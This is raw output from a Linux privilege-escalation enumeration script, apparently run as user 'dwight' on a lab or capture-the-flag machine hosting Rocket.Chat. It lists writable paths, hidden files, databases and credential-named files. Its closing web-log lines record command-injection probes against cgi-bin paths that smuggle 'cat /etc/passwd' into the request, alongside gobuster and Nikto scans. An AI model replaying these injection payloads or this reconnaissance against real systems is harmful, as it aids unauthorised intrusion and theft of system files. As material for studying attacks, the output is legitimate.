-rw-r--r--. 1 root root 5132 May 13  2019 /usr/share/help/el/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 5562 May 13  2019 /usr/share/help/el/gnome-help/backup-how.page
-rw-r--r--. 1 root root 3614 May 13  2019 /usr/share/help/el/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 6883 May 13  2019 /usr/share/help/el/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 6104 May 13  2019 /usr/share/help/el/gnome-help/backup-what.page
-rw-r--r--. 1 root root 4888 May 13  2019 /usr/share/help/el/gnome-help/backup-where.page
-rw-r--r--. 1 root root 3678 May 13  2019 /usr/share/help/el/gnome-help/backup-why.page
-rw-r--r--. 1 root root 2941 May 13  2019 /usr/share/help/es/gnome-help/backup-check.page
-rw-r--r--. 1 root root 3265 May 13  2019 /usr/share/help/es/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 3592 May 13  2019 /usr/share/help/es/gnome-help/backup-how.page
-rw-r--r--. 1 root root 2404 May 13  2019 /usr/share/help/es/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 4639 May 13  2019 /usr/share/help/es/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 3692 May 13  2019 /usr/share/help/es/gnome-help/backup-what.page
-rw-r--r--. 1 root root 3418 May 13  2019 /usr/share/help/es/gnome-help/backup-where.page
-rw-r--r--. 1 root root 2426 May 13  2019 /usr/share/help/es/gnome-help/backup-why.page
-rw-r--r--. 1 root root 2335 May 13  2019 /usr/share/help/fi/gnome-help/backup-check.page
-rw-r--r--. 1 root root 2562 May 13  2019 /usr/share/help/fi/gnome-help/backup-frequency.page
-rw-r--r--. 1 root root 2911 May 13  2019 /usr/share/help/fi/gnome-help/backup-how.page
-rw-r--r--. 1 root root 1814 May 13  2019 /usr/share/help/fi/gnome-help/backup-restore.page
-rw-r--r--. 1 root root 3903 May 13  2019 /usr/share/help/fi/gnome-help/backup-thinkabout.page
-rw-r--r--. 1 root root 2995 May 13  2019 /usr/share/help/fi/gnome-help/backup-what.page
-rw-r--r--. 1 root root 2974 May 13  2019 /usr/share/help/fi/gnome-help/backup-where.page
-rw-r--r--. 1 root root 1896 May 13  2019 /usr/share/help/fi/gnome-help/backup-why.page
-rw-r--r--. 1 root root 4131 May 13  2019 /usr/share/help/fr/gnome-help/backup-check.page
-rw-r--r--. 1 root root 4388 May 13  2019 /usr/share/help/fr/gnome-help/backup-frequency.page

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/pki/nssdb/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/pki/nssdb/cert9.db: SQLite 3.x database, last written using SQLite version 0
Found /etc/pki/nssdb/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /etc/pki/nssdb/key4.db: SQLite 3.x database, last written using SQLite version 0
Found /etc/pki/nssdb/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order)
Found /home/dwight/.local/share/containers/storage/libpod/bolt_state.db: data
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3026000
Found /var/lib/colord/mapping.db: SQLite 3.x database, last written using SQLite version 3026000
Found /var/lib/colord/storage.db: SQLite 3.x database, last written using SQLite version 3026000
Found /var/lib/dnf/history.sqlite: SQLite 3.x database, last written using SQLite version 3026000
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3026000

 -> Extracting tables from /etc/pki/nssdb/cert9.db (limit 20)

 -> Extracting tables from /etc/pki/nssdb/key4.db (limit 20)

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)

 -> Extracting tables from /var/lib/colord/mapping.db (limit 20)

 -> Extracting tables from /var/lib/colord/storage.db (limit 20)

 -> Extracting tables from /var/lib/dnf/history.sqlite (limit 20)





 -> Extracting tables from /var/lib/fwupd/pending.db (limit 20)


╔══════════╣ Web files?(output limit)
/var/www/:
total 4.0K
drwxr-xr-x.  4 root root   33 Nov 11  2021 .
drwxr-xr-x. 22 root root 4.0K Jan 14 05:58 ..
drwxr-xr-x.  2 root root    6 Nov 11  2021 cgi-bin
drwxr-xr-x.  4 root root   38 Nov 11  2021 html

/var/www/cgi-bin:
total 0
drwxr-xr-x. 2 root root  6 Nov 11  2021 .

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r--. 1 root root 172 Dec 22 08:33 /boot/.vmlinuz-4.18.0-348.7.1.el8_5.x86_64.hmac
-rw------- 1 root root 0 May 29 12:13 /run/lsm/ipc/.lsmd-ipc-lock
-rw-r--r-- 1 root root 0 May 29 12:13 /run/initramfs/.need_shutdown
-rw-r--r--. 1 root root 18 Jul 27  2021 /etc/skel/.bash_logout
-rw-r--r--. 1 root root 129 Dec 21 15:10 /etc/selinux/targeted/.policy.sha512
-rw-------. 1 root root 0 Jul  3  2021 /etc/.pwd.lock
-rw-------. 1 root root 147 Aug  7  2018 /etc/insights-client/.exp.sed
-rw-------. 1 root root 80626 Dec 11  2018 /etc/insights-client/.fallback.json
-rw-------. 1 root root 811 Dec 11  2018 /etc/insights-client/.fallback.json.asc
-rw-r--r--. 1 root root 208 Jan 14 04:52 /etc/.updated
-rw-r--r--. 1 root root 0 Jul  3  2021 /var/lib/rpm/.rpm.lock
-rw-r--r--. 1 root root 0 Jul  3  2021 /var/lib/flatpak/.changed
-rw-r--r-- 1 root root 208 Jan 14 04:52 /var/.updated
-rw-r--r--. 1 root root 165 Jun  4  2019 /usr/lib/modules/4.18.0-80.el8.x86_64/.vmlinuz.hmac
-rw-r--r--. 1 root root 172 Dec 22 08:33 /usr/lib/modules/4.18.0-348.7.1.el8_5.x86_64/.vmlinuz.hmac
-rw-r--r-- 1 root root 0 Sep 29  2021 /usr/lib/dracut/modules.d/99squash/.shchkdir
-rw-r--r-- 1 root root 88 Oct 26  1985 /usr/lib/node_modules/node-gyp/.jshintrc
-rw-r--r-- 1 root root 62 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/ajv/scripts/.eslintrc.yml
-rw-r--r-- 1 root root 439 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/ajv/.tonic_example.js
-rw-r--r-- 1 root root 91 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/aws4/.travis.yml
-rw-r--r-- 1 root root 43 Jun  8  2012 /usr/lib/node_modules/node-gyp/node_modules/concat-map/.travis.yml
-rw-r--r-- 1 root root 286 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/extend/.editorconfig
-rw-r--r-- 1 root root 397 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/extend/.eslintrc
-rw-r--r-- 1 root root 4096 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/extend/.jscs.json
-rw-r--r-- 1 root root 6899 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/extend/.travis.yml
-rw-r--r-- 1 root root 562 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/fast-json-stable-stringify/.eslintrc.yml
-rw-r--r-- 1 root root 111 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/fast-json-stable-stringify/.travis.yml
-rw-r--r-- 1 root root 113 Apr 21  2016 /usr/lib/node_modules/node-gyp/node_modules/getpass/.travis.yml
-rw-r--r-- 1 root root 178 Aug 24  2017 /usr/lib/node_modules/node-gyp/node_modules/http-signature/.dir-locals.el
-rw-r--r-- 1 root root 48 Dec 10  2015 /usr/lib/node_modules/node-gyp/node_modules/isarray/.travis.yml
-rw-r--r-- 1 root root 1147 Apr  6  2014 /usr/lib/node_modules/node-gyp/node_modules/isstream/.jshintrc
-rw-r--r-- 1 root root 150 Apr  6  2014 /usr/lib/node_modules/node-gyp/node_modules/isstream/.travis.yml
-rw-r--r-- 1 root root 630 May  8  2018 /usr/lib/node_modules/node-gyp/node_modules/json-schema-traverse/.eslintrc.yml
-rw-r--r-- 1 root root 108 May  8  2018 /usr/lib/node_modules/node-gyp/node_modules/json-schema-traverse/.travis.yml
-rw-r--r-- 1 root root 91 May  8  2018 /usr/lib/node_modules/node-gyp/node_modules/json-schema-traverse/spec/.eslintrc.yml
-rw-r--r-- 1 root root 116 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/minimist/.travis.yml
-rw-r--r-- 1 root root 134 Nov 12  2015 /usr/lib/node_modules/node-gyp/node_modules/nopt/.travis.yml
-rw-r--r-- 1 root root 193 Jan  3  2017 /usr/lib/node_modules/node-gyp/node_modules/performance-now/.tm_properties
-rw-r--r-- 1 root root 65 Feb 19  2017 /usr/lib/node_modules/node-gyp/node_modules/performance-now/.travis.yml
-rw-r--r-- 1 root root 399 Jul 26  2017 /usr/lib/node_modules/node-gyp/node_modules/qs/.editorconfig
-rw-r--r-- 1 root root 5 Dec 23  2015 /usr/lib/node_modules/node-gyp/node_modules/qs/.eslintignore
-rw-r--r-- 1 root root 554 May  2  2018 /usr/lib/node_modules/node-gyp/node_modules/qs/.eslintrc
-rw-r--r-- 1 root root 348 Sep  9  2017 /usr/lib/node_modules/node-gyp/node_modules/qs/test/.eslintrc
-rw-r--r-- 1 root root 991 Oct 26  1985 /usr/lib/node_modules/node-gyp/node_modules/readable-stream/.travis.yml
-rw-r--r-- 1 root root 189 Apr 21  2016 /usr/lib/node_modules/node-gyp/node_modules/sshpk/.travis.yml
-rw-r--r-- 1 root root 245 Jan 10 07:20 /usr/lib/node_modules/npm/.licensee.json
-rw-r--r-- 1 root root 3274 Jan 10 07:20 /usr/lib/node_modules/npm/.mailmap
-rw-r--r-- 1 root root 0 Oct 14  2021 /usr/lib/node_modules/npm/.npmrc
-rw-r--r-- 1 root root 269 Jan 10 07:20 /usr/lib/node_modules/npm/.travis.yml
-rw-r--r-- 1 root root 59 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/JSONStream/.travis.yml
-rw-r--r-- 1 root root 309 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/agent-base/.travis.yml
-rw-r--r-- 1 root root 43 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/archy/.travis.yml
-rw-r--r-- 1 root root 1308 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/are-we-there-yet/node_modules/readable-stream/.travis.yml
-rw-r--r-- 1 root root 59 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/aws4/.travis.yml
-rw-r--r-- 1 root root 48 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/builtins/.travis.yml
-rw-r--r-- 1 root root 1160 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/color-name/.eslintrc.json
-rw-r--r-- 1 root root 43 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/concat-map/.travis.yml
-rw-r--r-- 1 root root 1308 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/concat-stream/node_modules/readable-stream/.travis.yml
-rw-r--r-- 1 root root 46 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/debug/.coveralls.yml
-rw-r--r-- 1 root root 185 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/debug/.travis.yml
-rw-r--r-- 1 root root 276 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/define-properties/.editorconfig
-rw-r--r-- 1 root root 4108 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/define-properties/.jscs.json
-rw-r--r-- 1 root root 6986 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/define-properties/.travis.yml
-rw-r--r-- 1 root root 111 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/dezalgo/.travis.yml
-rw-r--r-- 1 root root 65 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/duplexify/.travis.yml
-rw-r--r-- 1 root root 1308 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/duplexify/node_modules/readable-stream/.travis.yml
-rw-r--r-- 1 root root 505 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/encoding/.travis.yml
-rw-r--r-- 1 root root 179 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/err-code/.editorconfig
-rw-r--r-- 1 root root 127 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/err-code/.eslintrc.json
-rw-r--r-- 1 root root 54 Jan 10 07:20 /usr/lib/node_modules/npm/node_modules/err-code/.travis.yml

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-rw-r-- 1 dwight dwight 4503 May 29 13:21 /tmp/a.py
-rw-r--r-- 1 dwight dwight 2902 May 29 13:23 /tmp/passwd
-rw-rw-r-- 1 dwight dwight 7333 May 29 13:58 /var/tmp/dnf-dwight-tbkfiypm/dnf.log
-rw-rw-r-- 1 dwight dwight 1856 May 29 13:58 /var/tmp/dnf-dwight-tbkfiypm/dnf.librepo.log
-rw-rw-r-- 1 dwight dwight 232 May 29 13:58 /var/tmp/dnf-dwight-tbkfiypm/dnf.rpm.log
-rw-rw-r-- 1 dwight dwight 2 May 29 13:58 /var/tmp/dnf-dwight-tbkfiypm/expired_repos.json
-rw-rw-r-- 1 dwight dwight 240 May 29 13:58 /var/tmp/dnf-dwight-tbkfiypm/hawkey.log

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/dwight
/run/user/1004
/run/user/1004/containers
/run/user/1004/dbus-1
/run/user/1004/dbus-1/services
/run/user/1004/gnupg
/run/user/1004/gvfs
/run/user/1004/libpod
/run/user/1004/pulse
/run/user/1004/pulse/pid
/run/user/1004/systemd
/tmp
/tmp/.esd-1004
/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAA0000000000000000000000000000000000
/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAA0000000000000000000000000000000001
/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAA0000000000000000000000000000000002
/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAA0000000000000000000000000000000003
#)You_can_write_even_more_files_inside_last_directory

/var/tmp
/var/tmp/dnf-dwight-tbkfiypm
/var/tmp/dnf-dwight-tbkfiypm/dnf.librepo.log
/var/tmp/dnf-dwight-tbkfiypm/dnf.log
/var/tmp/dnf-dwight-tbkfiypm/dnf.rpm.log
/var/tmp/dnf-dwight-tbkfiypm/expired_repos.json
/var/tmp/dnf-dwight-tbkfiypm/hawkey.log
#)You_can_write_even_more_files_inside_last_directory

/var/tmp/dnf-dwight-tbkfiypm/locks/4d43db921d9692818dd20e69d93688f376f931df

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group dwight:
/var/tmp/dnf-dwight-tbkfiypm/dnf.log
/var/tmp/dnf-dwight-tbkfiypm/dnf.librepo.log
/var/tmp/dnf-dwight-tbkfiypm/dnf.rpm.log
/var/tmp/dnf-dwight-tbkfiypm/expired_repos.json
/var/tmp/dnf-dwight-tbkfiypm/hawkey.log
/tmp/a.py

╔══════════╣ Searching passwords in history files
 * @licstart The following is the entire license notice for the
 * @licend The above is the entire license notice for the
 * @licstart The following is the entire license notice for the
 * @licend The above is the entire license notice for the
 * @licstart The following is the entire license notice for the
 * @licend The above is the entire license notice for the

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/authselect/password-auth
/etc/brlapi.key
/etc/pam.d/gdm-password
/etc/pam.d/password-auth
/etc/pki/tls/private/localhost.key
/etc/trusted-key.key
/etc/unbound/root.key
/opt/Rocket.Chat/programs/server/node_modules/node-gyp/test/fixtures/server.key
/opt/Rocket.Chat/programs/server/npm/node_modules/@google-cloud/common/node_modules/agent-base/test/ssl-cert-snakeoil.key
/opt/Rocket.Chat/programs/server/npm/node_modules/@google-cloud/common/node_modules/google-auth-library/build/src/auth/credentials.d.ts
/opt/Rocket.Chat/programs/server/npm/node_modules/@google-cloud/common/node_modules/google-auth-library/build/src/auth/credentials.js
/opt/Rocket.Chat/programs/server/npm/node_modules/@grpc/grpc-js/build/src/call-credentials-filter.d.ts
/opt/Rocket.Chat/programs/server/npm/node_modules/@grpc/grpc-js/build/src/call-credentials-filter.js
/opt/Rocket.Chat/programs/server/npm/node_modules/@grpc/grpc-js/build/src/call-credentials-filter.js.map
/opt/Rocket.Chat/programs/server/npm/node_modules/@grpc/grpc-js/build/src/call-credentials.d.ts
  #)[3mThere are more creds/passwds files in the previous parent folder[0m

/opt/Rocket.Chat/programs/server/npm/node_modules/@grpc/grpc-js/src/call-credentials.ts
/opt/Rocket.Chat/programs/server/npm/node_modules/@grpc/grpc-js/src/channel-credentials.ts
/opt/Rocket.Chat/programs/server/npm/node_modules/@grpc/grpc-js/src/server-credentials.ts
  #)[3mThere are more creds/passwds files in the previous parent folder[0m

/opt/Rocket.Chat/programs/server/npm/node_modules/apn/lib/credentials
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/cert.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certIssuerKey.p12
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certIssuerKey.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certIssuerKeyOpenSSL.p12
  #)[3mThere are more creds/passwds files in the previous parent folder[0m

/opt/Rocket.Chat/programs/server/npm/node_modules/aws-sdk/lib/credentials
/opt/Rocket.Chat/programs/server/npm/node_modules/aws-sdk/lib/credentials.d.ts
/opt/Rocket.Chat/programs/server/npm/node_modules/aws-sdk/lib/credentials.js
/opt/Rocket.Chat/programs/server/npm/node_modules/aws-sdk/lib/credentials/chainable_temporary_credentials.d.ts
/opt/Rocket.Chat/programs/server/npm/node_modules/aws-sdk/lib/credentials/chainable_temporary_credentials.js
/opt/Rocket.Chat/programs/server/npm/node_modules/aws-sdk/lib/credentials/cognito_identity_credentials.d.ts
/opt/Rocket.Chat/programs/server/npm/node_modules/aws-sdk/lib/credentials/cognito_identity_credentials.js
  #)[3mThere are more creds/passwds files in the previous parent folder[0m


╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
10.10.14.101 - - [29/May/2022:12:21:46 -0400] "GET /cgi-bin/excite;IFS=\\\"$\\\";/bin/cat /etc/passwd" 400 226 "-" "-"
10.10.14.132 - - [29/May/2022:12:58:34 -0400] "GET /.htpasswd HTTP/1.1" 403 199 "-" "gobuster/3.1.0"
10.10.14.132 - - [29/May/2022:13:16:46 -0400] "GET /cgi-bin/excite;IFS=\\\"$\\\";/bin/cat /etc/passwd" 400 226 "-" "-"
10.10.14.132 - - [29/May/2022:13:17:40 -0400] "GET /cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download" 400 226 "-" "-"
10.10.14.132 - - [29/May/2022:13:19:20 -0400] "GET /cgi-bin/.htpasswd HTTP/1.1" 403 199 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:002733)"
10.10.14.132 - - [29/May/2022:13:19:21 -0400] "GET /.htpasswd HTTP/1.1" 403 199 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:002739)"